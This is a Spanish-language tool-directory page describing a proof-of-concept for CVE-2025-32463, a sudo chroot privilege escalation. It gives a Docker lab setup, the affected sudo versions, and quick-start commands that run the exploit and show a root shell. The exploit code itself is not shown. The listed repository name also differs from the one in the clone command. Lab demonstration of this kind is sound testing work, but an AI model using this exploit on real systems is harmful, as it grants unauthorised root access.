Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-32463_POC — Prueba de concepto del exploit para CVE-2025-32463, una vulnerabilidad de escalada de privilegios en la función chroot de sudo. Incluye entorno Docker y script de exploit para generar una shell de root. | Kitploit
Herramientas/GitHubGitHub/zhaduchanhzz/cve-2025-32463_poc
Escalada de PrivilegiosSeguridad de ContenedoresAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónExplotación de Binarios
GitHubzhaduchanhzz/cve-2025-32463_poc

CVE-2025-32463_POC

Prueba de concepto del exploit para CVE-2025-32463, una vulnerabilidad de escalada de privilegios en la función chroot de sudo. Incluye entorno Docker y script de exploit para generar una shell de root.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
9hace 1 añoAún no revisado

CVE-2025-32463 – PoC de sudo chroot («chwoot»)

Este repositorio proporciona un entorno mínimo y reproducible para demostrar el fallo de escalada de privilegios CVE‑2025‑32463 en la función chroot de sudo.


Contenido

ArchivoPropósito
DockerfileCrea una imagen de Ubuntu 24.04 con sudo 1.9.16p2 vulnerable y herramientas de compilación
sudo‑chwoot.shExploit de prueba de concepto que lanza una shell de root dentro del chroot
run.shScript auxiliar que construye la imagen (si es necesario) y lanza el contenedor del exploit

Versiones afectadas

Las versiones vulnerables de sudo 1.9.14 hasta 1.9.17 (todas las revisiones p) en la mayoría de las distribuciones Linux están afectadas.


Inicio rápido

# 1 – clone repo
$ git clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot.git
$ cd CVE-2025-32463_chwoot

# 2 – build and run Docker image (tagged "sudo-chwoot")
$ ./run.sh

# 3 – run exploit in container (drops you into a root shell)
pwn@0da3726bd81f:~$ ./sudo-chwoot.sh
woot!
root@0da3726bd81f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(pwn)

run.sh pasa --privileged y --rm a Docker para que el contenedor se limpie solo al salir.


Limpieza

Elimina la imagen cuando hayas terminado:

docker rmi sudo-chwoot

Referencia

  • Nota de vulnerabilidad de Stratascale CRU: https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot
Descargar herramienta